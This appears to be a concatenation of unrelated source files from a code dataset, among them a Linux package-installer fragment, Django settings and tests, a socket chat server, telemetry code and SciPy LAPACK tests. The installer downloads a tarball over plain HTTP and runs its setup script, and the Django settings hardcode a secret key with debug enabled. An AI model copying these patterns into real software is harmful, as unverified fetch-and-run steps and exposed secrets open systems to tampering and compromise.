Run("echo '** dnspython packages installed failed **' >> PackageStatus.txt")
return False
RunLog.info ("pexpect, paramiko and dnspython packages installed successfully!")
Run("echo '** pexpect, paramiko and dnspython packages installed successfully **' >> PackageStatus.txt")
return True
def install_ez_setup():
RunLog.info ("Installing ez_setup.py...")
ez_setup = os.path.join("/tmp", "ez_setup.py")
DownloadUrl(tar_link.get("ez_setup.py"), "/tmp/", output_file=ez_setup)
if not os.path.isfile(ez_setup):
RunLog.error("Installing ez_setup.py...[failed]")
RunLog.error("File not found: {0}".format(ez_setup))
return False
output = Run("{0} {1}".format(python_cmd, ez_setup))
return ("Finished" in output)
def InstallGcc():
RunLog.info("Interactive installing Package: gcc")
Run("wget http://pexpect.sourceforge.net/pexpect-2.3.tar.gz;tar xzf pexpect-2.3.tar.gz;cd pexpect-2.3;python ./setup.py install;cd ..")
import pexpect
cmd = 'zypper install gcc'
child = pexpect.spawn(cmd)
fout = file('GccInstallLog.txt','w')
child.logfile = fout
index = child.expect(["(?i)Choose from above solutions by number or cancel", pexpect.EOF, pexpect.TIMEOUT])
if(index == 0):
child.sendline('1')
RunLog.info("choose option 1")
index = child.expect(["(?i)Continue?", pexpect
|
Sauron754/SpaceScript
|
old/testEnvironments/SpaceScript/threadingFunctions.py
|
Python
|
gpl-3.0
| 1,480
| 0.031757
|
import SpaceScript
import multiprocessing
from multiprocessing import Process, Queue, Pipe, Lock
from SpaceScript import frontEnd
from SpaceScript import utility
from SpaceScript.frontEnd import terminal
from SpaceScript.utility import terminalUtility
from SpaceScript.terminal import terminal as terminal
from SpaceScript.utility.terminalUtility import safePull as safePull
from SpaceScript.utility.terminalUtility import termThreadEventHandler as termThreadEventHandler
from SpaceScript.utility.terminalUtility import termThreadControlHandler as termThreadControlHandler
from appJar import gui
def simThread(queues_arr, pipes_arr, holdValue_v, objectArray_arr = None,
mainLock = None):
def termThread(queues_arr, pipes_arr, holdValue_v, objectArray_arr = None,
mainLock = None):
commandPipe = pipes_arr[0]
controlQueue_q = queues_arr[0]
pullString_q = multiprocessing.Queue()
pushString_q = multiprocessing.Queue()
	termThreadHold_v = multiprocessing.Value()
guiHold_v = multiprocessing.Value()
guiHold_v.value = False
termThreadHold_v.value = False
	subProcess = multiprocessing.Process(target = terminal, args = (0,
pullString_q, pushString_q,
guiHold_v, termThreadHold_v))
subProcess.start()
checkSequence_bool = True
while checkSequence_bool:
termThreadEventHandler(termThreadHold_v, pullString_q, commandPipe,
holdValue_v)
termThreadControlHandler(termThreadHold_v, controlQueue_q, pushString_q,
guiHold_v)
|
nive/nive
|
nive/components/iface/tests/test_iface.py
|
Python
|
gpl-3.0
| 1,151
| 0.034752
|
# -*- coding: utf-8 -*-
import time
import unittest
from nive.security import User
"""
#totest:
templates/
definitions.py
parts.py
root.py
search.py
view.py
"""
class IfaceTest:#(unittest.TestCase): # TODO tests
def setUp(self):
app = App()
app.SetConfiguration({"objects": [typedef]})
self.c = IFace(app)
def testReg(self):
self.c.RegisterType(typedef)
self.c.RegisterComponent(viewdef)
def testGet(self):
container = Ob()
container.IContainer=1
object = Ob()
addtype = "page"
self.assertTrue(self.c.GetFldsAdd(container, addtype))
self.assertTrue(self.c.GetFldsEdit(object))
self.assertTrue(self.c.GetFldsMetaView(object))
self.assertTrue(self.c.GetFldsDataView(object))
def testSearch(self):
container = Ob()
container.IContainer=1
        self.assertTrue(self.c.GetSearchConf("", container=container))
self.assertTrue(self.c.GetSearchConf("default", container=container))
def testF(self):
object = Ob()
self.assertTrue(self.c.GetTabs(object))
self.assertTrue(self.c.GetShortcuts(object))
def testRedirect(self):
object = Ob()
self.assertTrue(self.c.GetRedirect("delete", view=object))
|
fidals/refarm-site
|
tests/ecommerce/tests_forms.py
|
Python
|
mit
| 1,163
| 0.00086
|
"""Tests for forms in eCommerce app."""
from django.test import TestCase
from ecommerce.forms import OrderForm
required_fields = {
'phone': '123456789',
'email': 'valid@email.ru',
}
invalid_form_email = {
'email': 'clearly!not_@_email',
'phone': '123456789'
}
no_phone = {'email': 'sss@sss.sss'}
class TestForm(TestCase):
"""Test suite for forms in eCommerce app."""
def test_empty_form(self):
"""Empty form shouldn't be valid."""
form = OrderForm()
|
self.assertFalse(form.is_valid())
def test_filled_form_without_required_field(self):
"""Form is still not valid, if there are some required fiel
|
ds left unfilled."""
form = OrderForm(data=no_phone)
self.assertFalse(form.is_valid())
def test_valid_form(self):
"""Form is valid, if there all required fields are filled."""
form = OrderForm(data=required_fields)
self.assertTrue(form.is_valid())
def test_from_validation_on_email_field(self):
"""Form should validate user's email if it is filled."""
form = OrderForm(data=invalid_form_email)
self.assertFalse(form.is_valid())
|
hgdeoro/pilas
|
pilasengine/fondos/__init__.py
|
Python
|
lgpl-3.0
| 2,302
| 0.000435
|
# -*- encoding: utf-8 -*-
# pilas engine: an engine for making video games
#
# Copyright 2010-2014 - Hugo Ruscitti
# License: LGPLv3 (see http://www.gnu.org/licenses/lgpl.html)
#
# Website - http://www.pilas-engine.com.ar
from pilasengine import colores
from pilasengine.fondos.fondo import Fondo
class Fondos(object):
"""Representa la propiedad pilas.fondos
Este objeto se encarga de hacer accesible
la creación de fondos para las escenas.
"""
def __init__(self, pilas):
self.pilas = pilas
def Plano(self):
import plano
nuevo_fondo = plano.Plano(self.pilas)
        # Important: when the actor is initialized, the __init__ method
        # makes a call to pilas.actores.agregar_actor
        # to attach the actor to the scene.
return nuevo_fondo
def Galaxia(self, dx=0, dy=-1):
import galaxia
nuevo_fondo = galaxia.Galaxia(self.pilas)
nuevo_fondo.dx = dx
nuevo_fondo.dy = dy
return nuevo_fondo
def Tarde(self):
import tarde
return tarde.Tarde(self.pilas)
def Selva(self):
import selva
return selva.Selva(self.pilas)
def Noche(self):
import noche
return noche.Noche(self.pilas)
def Espacio(self):
import espacio
return espacio.Espacio(self.pilas)
def Nubes(self):
import nubes
return nubes.Nubes(self.pilas)
def Pasto(self):
import pasto
return pasto.Pasto(self.pilas)
def Volley(self):
import volley
return volley.Volley(self.pilas)
def Color(self, _color=colores.blanco):
import color
return color.Color(self.pilas, _color)
    def Blanco(self):
import blanco
return blanco.Blanco(self.pilas)
def Fondo(self, imagen=None):
import fondo
return fondo.Fondo(self.pilas, imagen)
def FondoMozaico(self, imagen=None):
import fondo_mozaico
return fondo_mozaico.FondoMozaico(self.pilas, imagen)
def Cesped(self):
import cesped
return cesped.Cesped(self.pilas)
def DesplazamientoHorizontal(self):
import desplazamiento_horizontal
        return desplazamiento_horizontal.DesplazamientoHorizontal(self.pilas)
|
Elico-Corp/openerp-7.0
|
sale_bom_split_anglo_saxon/__init__.py
|
Python
|
agpl-3.0
| 158
| 0
|
# -*- coding: utf-8 -*-
# © 2014 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or later(http://www.gnu.org/licenses/agpl.html)
import invoice
|
fahadkaleem/CodeWars
|
8 kyu/python/Dollars and Cents.py
|
Python
|
mit
| 151
| 0.006623
|
# https://www.codewars.com/kata/55902c5eaa8069a5b4000083
def format_money(amount):
# your formatting code here
    return '${:.2f}'.format(amount)
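# Hedged sanity check (added; not part of the original kata submission).
# '{:.2f}' always renders two decimal places, which is all the kata asks for.
if __name__ == "__main__":
    assert format_money(13.9) == '$13.90'
    assert format_money(1) == '$1.00'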
|
goldhand/onegreek
|
onegreek/events/urls.py
|
Python
|
bsd-3-clause
| 1,273
| 0.011783
|
try:
from django.conf.urls import *
except ImportError: # django < 1.4
from django.conf.urls.defaults import *
from .views import EventDetail, EventList, EventCreate, EventCreateJSON, EventDelete, EventUpdate
urlpatterns = patterns("events.views",
url(r"^$", EventList.as_view(template_name='events/event_list_calendar.html'), name='list'),
#url(r"^$", EventList.as_view(), name='list'),
url(r"^create/$", EventCreate.as_view(), name='create'),
url(r"^create/json/$", EventCreateJSON.as_view(), name='create_json'),
url(r"^(?P<pk>\d+)/$", EventDetail.as_view(), name='detail'),
url(r"^(?P<pk>\d+)/update$", EventUpdate.as_view(), name='update'),
|
url(r"^(?P<pk>\d+)/delete/$", EventDelete.as_view(), name='delete'),
url(r"^(?P<event_id>\d+)/rsvp/$", 'rsvp_event', name='rsvp'),
url(r"^(?P<event_id>\d+)/attend/$", 'attend_event', name='attend'),
#url(r"^calendar/(?P<year>\d+)/(?P<month>\d+)/$", 'calendar', name='calendar'),
|
#url(r"^calendar/$", CalendarRedirectView.as_view(), name='calendar-redirect'),
)
|
juanlumn/juanlumn
|
juanlumn/juanlumn/settings.py
|
Python
|
mit
| 2,719
| 0
|
"""
Django settings for juanlumn project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*943gs9_&tpl8nt4^24bk&(^g#9aa^h^z=zacbkn#qwot1v0ok'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'main',
'header',
'footer',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'juanlumn.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'juanlumn.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
|
teoliphant/numba
|
numba/ad.py
|
Python
|
bsd-2-clause
| 7,869
| 0.002796
|
"""
Example of how to use byte-code execution technique to trace accesses to numpy arrays.
This file demonstrates two applications of this technique:
* optimize numpy computations for repeated calling
* provide automatic differentiation of procedural code
"""
import __builtin__
import os
import sys
import inspect
import trace
import opcode
import numpy as np
import theano
from .utils import itercode
# Opcode help: http://docs.python.org/library/dis.html
# XXX: support full calling convention for named args, *args and **kwargs
class FrameVM(object):
"""
A Class for evaluating a code block of CPython bytecode,
and tracking accesses to numpy arrays.
"""
def __init__(self, watcher, func):
print 'FrameVM', func
self.watcher = watcher
self.func = func
self.fco = func.func_code
self.names = self.fco.co_names
self.varnames = self.fco.co_varnames
self.constants = self.fco.co_consts
self.costr = func.func_code.co_code
self.argnames = self.fco.co_varnames[:self.fco.co_argcount]
self.stack = []
def call(self, args, kwargs):
self.rval = None
self._myglobals = {}
for name in self.names:
#print 'name', name
try:
self._myglobals[name] = self.func.func_globals[name]
except KeyError:
try:
self._myglobals[name] = __builtin__.__getattribute__(name)
except AttributeError:
#print 'WARNING: name lookup failed', name
pass
self._locals = [None] * len(self.fco.co_varnames)
for i, name in enumerate(self.argnames):
#print 'i', args, self.argnames, self.fco.co_varnames
self._locals[i] = args[i]
self.code_iter = itercode(self.costr)
jmp = None
while True:
try:
i, op, arg = self.code_iter.send(jmp)
except StopIteration:
break
name = opcode.opname[op]
#print 'OP: ', i, name
jmp = getattr(self, 'op_' + name)(i, op, arg)
return self.rval
def op_BINARY_ADD(self, i, op, arg):
arg2 = self.stack.pop(-1)
arg1 = self.stack.pop(-1)
r = arg1 + arg2
        self.stack.append(r)
if (id(arg1) in self.watcher.svars
or id(arg2) in self.watcher.svars):
s1 = self.watcher.svars.get(id(arg1), arg1)
s2 = self.watcher.svars.get(id(arg2), arg2)
self.watcher.svars[id(r)] = s1 + s2
|
#print 'added sym'
def op_BINARY_SUBTRACT(self, i, op, arg):
arg2 = self.stack.pop(-1)
arg1 = self.stack.pop(-1)
r = arg1 - arg2
self.stack.append(r)
if (id(arg1) in self.watcher.svars
or id(arg2) in self.watcher.svars):
s1 = self.watcher.svars.get(id(arg1), arg1)
s2 = self.watcher.svars.get(id(arg2), arg2)
self.watcher.svars[id(r)] = s1 - s2
def op_BINARY_MULTIPLY(self, i, op, arg):
arg2 = self.stack.pop(-1)
arg1 = self.stack.pop(-1)
r = arg1 * arg2
self.stack.append(r)
if (id(arg1) in self.watcher.svars
or id(arg2) in self.watcher.svars):
s1 = self.watcher.svars.get(id(arg1), arg1)
s2 = self.watcher.svars.get(id(arg2), arg2)
self.watcher.svars[id(r)] = s1 * s2
#print 'mul sym', id(r)
def op_CALL_FUNCTION(self, i, op, arg):
# XXX: does this work with kwargs?
args = [self.stack[-ii] for ii in range(arg, 0, -1)]
if arg > 0:
self.stack = self.stack[:-arg]
func = self.stack.pop(-1)
recurse = True
if func.__module__ and func.__module__.startswith('numpy'):
recurse = False
if 'built-in' in str(func):
recurse = False
if recurse:
vm = FrameVM(self.watcher, func)
rval = vm.call(args, {})
else:
#print 'running built-in', func, func.__name__, args
rval = func(*args)
if any(id(a) in self.watcher.svars for a in args):
sargs = [self.watcher.svars.get(id(a), a)
for a in args]
if func.__name__ == 'sum':
#print 'sym sum', sargs
self.watcher.svars[id(rval)] = theano.tensor.sum(*sargs)
else:
raise NotImplementedError(func)
self.stack.append(rval)
def op_COMPARE_OP(self, i, op, arg):
opname = opcode.cmp_op[arg]
left = self.stack.pop(-1)
right = self.stack.pop(-1)
if 0: pass
elif opname == '==': self.stack.append(left == right)
elif opname == '!=': self.stack.append(left != right)
else:
raise NotImplementedError('comparison: %s' % opname)
def op_FOR_ITER(self, i, op, arg):
# either push tos.next()
# or pop tos and send (arg)
tos = self.stack[-1]
try:
next = tos.next()
print 'next', next
self.stack.append(next)
except StopIteration:
self.stack.pop(-1)
return ('rel', arg)
def op_JUMP_ABSOLUTE(self, i, op, arg):
print 'sending', arg
return ('abs', arg)
def op_JUMP_IF_TRUE(self, i, op, arg):
tos = self.stack[-1]
if tos:
return ('rel', arg)
def op_GET_ITER(self, i, op, arg):
# replace tos -> iter(tos)
tos = self.stack[-1]
self.stack[-1] = iter(tos)
if id(tos) in self.watcher.svars:
raise NotImplementedError('iterator of watched value')
def op_LOAD_GLOBAL(self, i, op, arg):
#print 'LOAD_GLOBAL', self.names[arg]
self.stack.append(self._myglobals[self.names[arg]])
def op_LOAD_ATTR(self, i, op, arg):
#print 'LOAD_ATTR', self.names[arg]
TOS = self.stack[-1]
self.stack[-1] = getattr(TOS, self.names[arg])
def op_LOAD_CONST(self, i, op, arg):
#print 'LOAD_CONST', self.constants[arg]
self.stack.append(self.constants[arg])
def op_LOAD_FAST(self, i, op, arg):
#print 'LOAD_FAST', self.varnames[arg]
self.stack.append(self._locals[arg])
def op_POP_BLOCK(self, i, op, arg):
print 'pop block, what to do?'
def op_POP_TOP(self, i, op, arg):
self.stack.pop(-1)
def op_PRINT_ITEM(self, i, op, arg):
print self.stack.pop(-1),
def op_PRINT_NEWLINE(self, i, op, arg):
print ''
def op_SETUP_LOOP(self, i, op, arg):
print 'SETUP_LOOP, what to do?'
def op_STORE_FAST(self, i, op, arg):
#print 'STORE_FAST', self.varnames[arg]
self._locals[arg] = self.stack.pop(-1)
def op_RAISE_VARARGS(self, i, op, arg):
if 1 <= arg:
exc = self.stack.pop(-1)
if 2 <= arg:
param = self.stack.pop(-1)
if 3 <= arg:
tb = self.stack.pop(-1)
raise NotImplementedError('exception handling')
def op_RETURN_VALUE(self, i, op, arg):
self.rval = self.stack.pop(-1)
class Watcher(object):
def __init__(self, inputs):
self.inputs = inputs
self.svars = {}
for var in inputs:
self.svars[id(var)] = theano.tensor.vector()
def call(self, fn, *args, **kwargs):
vm = FrameVM(self, fn)
return vm.call(args, kwargs)
def grad_fn(self, rval, ival):
sy = self.svars[id(rval)]
sx = self.svars[id(ival)]
dydx = theano.tensor.grad(sy, sx)
return theano.function([sx], dydx)
def recalculate_fn(self, rval, ival):
sy = self.svars[id(rval)]
sx = self.svars[id(ival)]
return theano.function([sx], sy)
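# Hedged usage sketch (illustrative only; `fn` and `x` are placeholders, and
# this is Python 2 code that additionally needs theano installed):
#
#   x = np.ones(4)
#   watcher = Watcher([x])                # watch x; a theano vector stands in for it
#   y = watcher.call(fn, x)               # run fn(x) under the bytecode tracer
#   dydx = watcher.grad_fn(y, x)          # compiled theano function for dy/dx
#   y_sym = watcher.recalculate_fn(y, x)  # recompute y symbolically from a new x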
|
ChromiumWebApps/chromium
|
tools/telemetry/telemetry/core/timeline/model.py
|
Python
|
bsd-3-clause
| 7,997
| 0.009003
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''A container for timeline-based events and traces and can handle importing
raw event data from different sources. This model closely resembles that in the
trace_viewer project:
https://code.google.com/p/trace-viewer/
'''
from operator import attrgetter
import weakref
import telemetry.core.timeline.process as tracing_process
from telemetry.core import web_contents
from telemetry.core import browser
# Register importers for data
from telemetry.core.timeline import bounds
from telemetry.core.timeline import empty_trace_importer
from telemetry.core.timeline import inspector_importer
from telemetry.core.timeline import trace_event_importer
_IMPORTERS = [
|
empty_trace_importer.EmptyTraceImporter,
    inspector_importer.InspectorTimelineImporter,
trace_event_importer.TraceEventTimelineImporter
]
class MarkerMismatchError(Exception):
def __init__(self):
super(MarkerMismatchError, self).__init__(
'Number or order of timeline markers does not match provided labels')
class MarkerOverlapError(Exception):
def __init__(self):
super(MarkerOverlapError, self).__init__(
'Overlapping timeline markers found')
class TimelineModel(object):
def __init__(self, event_data=None, shift_world_to_zero=True):
self._bounds = bounds.Bounds()
self._thread_time_bounds = {}
self._processes = {}
self._browser_process = None
self._frozen = False
self.import_errors = []
self.metadata = []
self.flow_events = []
# Use a WeakKeyDictionary, because an ordinary dictionary could keep
# references to Tab objects around until it gets garbage collected.
# This would prevent telemetry from navigating to another page.
self._core_object_to_timeline_container_map = weakref.WeakKeyDictionary()
if event_data is not None:
self.ImportTraces([event_data], shift_world_to_zero=shift_world_to_zero)
@property
def bounds(self):
return self._bounds
@property
def thread_time_bounds(self):
return self._thread_time_bounds
@property
def processes(self):
return self._processes
@property
def browser_process(self):
return self._browser_process
@browser_process.setter
def browser_process(self, browser_process):
self._browser_process = browser_process
def ImportTraces(self, traces, shift_world_to_zero=True):
if self._frozen:
raise Exception("Cannot add events once recording is done")
importers = []
for event_data in traces:
importers.append(self._CreateImporter(event_data))
importers.sort(cmp=lambda x, y: x.import_priority - y.import_priority)
for importer in importers:
# TODO: catch exceptions here and add it to error list
importer.ImportEvents()
self.FinalizeImport(shift_world_to_zero, importers)
def FinalizeImport(self, shift_world_to_zero=False, importers=None):
if importers == None:
importers = []
self.UpdateBounds()
if not self.bounds.is_empty:
for process in self._processes.itervalues():
process.AutoCloseOpenSlices(self.bounds.max,
self.thread_time_bounds)
for importer in importers:
importer.FinalizeImport()
for process in self.processes.itervalues():
process.FinalizeImport()
if shift_world_to_zero:
self.ShiftWorldToZero()
self.UpdateBounds()
# Because of FinalizeImport, it would probably be a good idea
# to prevent the timeline from from being modified.
self._frozen = True
def ShiftWorldToZero(self):
self.UpdateBounds()
if self._bounds.is_empty:
return
shift_amount = self._bounds.min
for event in self.IterAllEvents():
event.start -= shift_amount
def UpdateBounds(self):
self._bounds.Reset()
for event in self.IterAllEvents():
self._bounds.AddValue(event.start)
self._bounds.AddValue(event.end)
self._thread_time_bounds = {}
for thread in self.GetAllThreads():
self._thread_time_bounds[thread] = bounds.Bounds()
for event in thread.IterEventsInThisContainer():
if event.thread_start != None:
self._thread_time_bounds[thread].AddValue(event.thread_start)
if event.thread_end != None:
self._thread_time_bounds[thread].AddValue(event.thread_end)
def GetAllContainers(self):
containers = []
def Iter(container):
containers.append(container)
for container in container.IterChildContainers():
Iter(container)
for process in self._processes.itervalues():
Iter(process)
return containers
def IterAllEvents(self):
for container in self.GetAllContainers():
for event in container.IterEventsInThisContainer():
yield event
def GetAllProcesses(self):
return self._processes.values()
def GetAllThreads(self):
threads = []
for process in self._processes.values():
threads.extend(process.threads.values())
return threads
def GetAllEvents(self):
return list(self.IterAllEvents())
def GetAllEventsOfName(self, name, only_root_events=False):
events = [e for e in self.IterAllEvents() if e.name == name]
if only_root_events:
return filter(lambda ev: ev.parent_slice == None, events)
else:
return events
def GetEventOfName(self, name, only_root_events=False,
fail_if_more_than_one=False):
events = self.GetAllEventsOfName(name, only_root_events)
if len(events) == 0:
raise Exception('No event of name "%s" found.' % name)
if fail_if_more_than_one and len(events) > 1:
raise Exception('More than one event of name "%s" found.' % name)
return events[0]
def GetOrCreateProcess(self, pid):
if pid not in self._processes:
assert not self._frozen
self._processes[pid] = tracing_process.Process(self, pid)
return self._processes[pid]
def FindTimelineMarkers(self, timeline_marker_names):
"""Find the timeline events with the given names.
If the number and order of events found does not match the names,
raise an error.
"""
# Make sure names are in a list and remove all None names
if not isinstance(timeline_marker_names, list):
timeline_marker_names = [timeline_marker_names]
names = [x for x in timeline_marker_names if x is not None]
# Gather all events that match the names and sort them.
events = []
name_set = set()
for name in names:
name_set.add(name)
for name in name_set:
events.extend(self.GetAllEventsOfName(name, True))
events.sort(key=attrgetter('start'))
# Check if the number and order of events matches the provided names,
# and that the events don't overlap.
if len(events) != len(names):
raise MarkerMismatchError()
for (i, event) in enumerate(events):
if event.name != names[i]:
raise MarkerMismatchError()
for i in xrange(0, len(events)):
for j in xrange(i+1, len(events)):
if (events[j].start < events[i].start + events[i].duration):
raise MarkerOverlapError()
return events
def GetRendererProcessFromTab(self, tab):
return self._core_object_to_timeline_container_map[tab]
def AddCoreObjectToContainerMapping(self, core_object, container):
""" Add a mapping from a core object to a timeline container.
Used for example to map a Tab to its renderer process in the timeline model.
"""
assert(isinstance(core_object, web_contents.WebContents) or
isinstance(core_object, browser.Browser))
self._core_object_to_timeline_container_map[core_object] = container
def _CreateImporter(self, event_data):
for importer_class in _IMPORTERS:
if importer_class.CanImport(event_data):
return importer_class(self, event_data)
raise ValueError("Could not find an importer for the provided event data")
|
carlosb1/examples-python
|
architecture/chatserver.py
|
Python
|
gpl-2.0
| 3,299
| 0.007881
|
import socket
import select
import signal
import sys
from communication import send, receive
class ChatServer(object):
def sighandler(self,signum,frame):
print('Shutting down server...')
for o in self.outputs:
o.close()
self.server.close()
def __init__(self, port=3490, backlog=5):
self.clients = 0
self.clientmap = {}
self.outputs = []
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
self.server.bind(('',port))
print('Listening to port',port,'...')
self.server.listen(backlog)
signal.signal(signal.SIGINT, self.sighandler)
def get_name(self, client):
info = self.clientmap[client]
host, name = info[0][0], info[1]
return '@'.join((name,host))
def serve(self):
inputs = [self.server,sys.stdin]
self.outputs = []
running = 1
while running:
try:
inputready, outputready, exceptready = select.select(inputs, self.outputs, [])
except select.error as e:
break
except socket.error as e:
break
for s in inputready:
if s == self.server:
client, address = self.server.accept()
print('chatserver: got connection %d from %s' % (client.fileno(), address))
cname = receive(client).split('NAME: ')[1]
                    self.clients += 1
send(client, 'CLIENT: '+str(address[0]))
inputs.append(client)
self.clientmap[client] = (address,cname)
                    msg= str('\n(Connected: New client '+str(self.clients)+' from '+ str(self.get_name(client)))
for o in self.outputs:
send(o,msg)
self.outputs.append(client)
elif s == sys.stdin:
|
junk = sys.stdin.readline()
running = 0
else:
try:
data = receive(s)
if data:
msg = '\n#['+self.get_name(s)+']>>'+data
for o in self.outputs:
if o!=s:
send(o,msg)
else:
print('chatserver: %d hung up' % s.fileno())
self.clients -=1
s.close()
inputs.remove(s)
self.outputs.remove(s)
msg = '\n(Hung up: Client from %s)' %self.get_name(s)
for o in self.outputs:
send(o,msg)
except socket.error as e:
inputs.remove(s)
self.outputs.remove(s)
self.server.close()
if __name__ == '__main__':
ChatServer().serve()
|
iamweilee/pylearn
|
traceback-example-1.py
|
Python
|
mit
| 285
| 0.014035
|
'''
The following example shows how the traceback module lets you print an
exception's traceback information from within a program, much like what the
interpreter does for an uncaught exception.
'''
# Note! Importing traceback clears the current exception state, so it is
# best not to import this module inside exception-handling code.
import traceback
try:
raise SyntaxError, "example"
except:
traceback.print_exc()
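# Expected behaviour (added note): print_exc() writes the usual
# "Traceback (most recent call last): ... SyntaxError: example" text to
# stderr, and execution continues after the except block.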
|
bertptrs/adventofcode
|
2019/aoc2019/day13.py
|
Python
|
mit
| 1,338
| 0
|
import statistics
from typing import TextIO, Tuple, Dict
from aoc2019.intcode import Computer, read_program
def render_screen(computer: Computer, screen: Dict[Tuple[int, int], int]):
while computer.output:
x = computer.output.popleft()
y = computer.output.popleft()
val = computer.output.popleft()
screen[x, y] = val
def part1(data: TextIO) -> int:
computer = Computer(read_program(data))
computer.run()
screen: Dict[Tuple[int, int], int] = {}
render_screen(computer, screen)
return sum(1 for val in screen.values() if val == 2)
def part2(data: TextIO) -> int:
computer = Computer(read_program(data))
computer.program[0] = 2
screen: Dict[Tuple[int, int], int] = {}
finished = False
while not finished:
try:
computer.run()
|
finished = True
        except IndexError:
# Waiting for input
pass
render_screen(computer, screen)
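        # Strategy note (comment added for clarity): tile id 4 is the ball and
        # tile id 3 is the paddle; nudging the joystick toward the ball's x
        # keeps the paddle underneath it until the game ends.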
ball_x = next(x for x, y in screen if screen[x, y] == 4)
paddle_x = statistics.mean(x for x, y in screen if screen[x, y] == 3)
if ball_x < paddle_x:
computer.input.append(-1)
elif ball_x > paddle_x:
computer.input.append(1)
else:
computer.input.append(0)
return screen[-1, 0]
|
WarrenWeckesser/scipy
|
scipy/linalg/tests/test_lapack.py
|
Python
|
bsd-3-clause
| 116,267
| 0.000017
|
#
# Created by: Pearu Peterson, September 2002
#
import sys
import subprocess
import time
from functools import reduce
from numpy.testing import (assert_equal, assert_array_almost_equal, assert_,
assert_allclose, assert_almost_equal,
assert_array_equal)
import pytest
from pytest import raises as assert_raises
import numpy as np
from numpy import (eye, ones, zeros, zeros_like, triu, tril, tril_indices,
triu_indices)
from numpy.random import rand, randint, seed
from scipy.linalg import (_flapack as flapack, lapack, inv, svd, cholesky,
solve, ldl, norm, block_diag, qr, eigh)
from scipy.linalg.lapack import _compute_lwork
from scipy.stats import ortho_group, unitary_group
import scipy.sparse as sps
try:
from scipy.linalg import _clapack as clapack
except ImportError:
clapack = None
from scipy.linalg.lapack import get_lapack_funcs
from scipy.linalg.blas import get_blas_funcs
REAL_DTYPES = [np.float32, np.float64]
COMPLEX_DTYPES = [np.complex64, np.complex128]
DTYPES = REAL_DTYPES + COMPLEX_DTYPES
def generate_random_dtype_array(shape, dtype):
# generates a random matrix of desired data type of shape
if dtype in COMPLEX_DTYPES:
return (np.random.rand(*shape)
+ np.random.rand(*shape)*1.0j).astype(dtype)
return np.random.rand(*shape).astype(dtype)
def test_lapack_documented():
"""Test that all entries are in the doc."""
if lapack.__doc__ is None: # just in case there is a python -OO
pytest.skip('lapack.__doc__ is None')
names = set(lapack.__doc__.split())
ignore_list = set([
'absolute_import', 'clapack', 'division', 'find_best_lapack_type',
'flapack', 'print_function', 'HAS_ILP64',
])
missing = list()
for name in dir(lapack):
if (not name.startswith('_') and name not in ignore_list and
name not in names):
missing.append(name)
assert missing == [], 'Name(s) missing from lapack.__doc__ or ignore_list'
class TestFlapackSimple:
def test_gebal(self):
a = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
a1 = [[1, 0, 0, 3e-4],
[4, 0, 0, 2e-3],
[7, 1, 0, 0],
[0, 1, 0, 0]]
for p in 'sdzc':
f = getattr(flapack, p+'gebal', None)
if f is None:
continue
ba, lo, hi, pivscale, info = f(a)
assert_(not info, repr(info))
assert_array_almost_equal(ba, a)
assert_equal((lo, hi), (0, len(a[0])-1))
assert_array_almost_equal(pivscale, np.ones(len(a)))
ba, lo, hi, pivscale, info = f(a1, permute=1, scale=1)
assert_(not info, repr(info))
# print(a1)
# print(ba, lo, hi, pivscale)
def test_gehrd(self):
a = [[-149, -50, -154],
[537, 180, 546],
[-27, -9, -25]]
for p in 'd':
f = getattr(flapack, p+'gehrd', None)
if f is None:
continue
ht, tau, info = f(a)
assert_(not info, repr(info))
def test_trsyl(self):
a = np.array([[1, 2], [0, 4]])
b = np.array([[5, 6], [0, 8]])
c = np.array([[9, 10], [11, 12]])
trans = 'T'
# Test single and double implementations, including most
# of the options
for dtype in 'fdFD':
a1, b1, c1 = a.astype(dtype), b.astype(dtype), c.astype(dtype)
trsyl, = get_lapack_funcs(('trsyl',), (a1,))
if dtype.isupper(): # is complex dtype
a1[0] += 1j
trans = 'C'
x, scale, info = trsyl(a1, b1, c1)
assert_array_almost_equal(np.dot(a1, x) + np.dot(x, b1),
scale * c1)
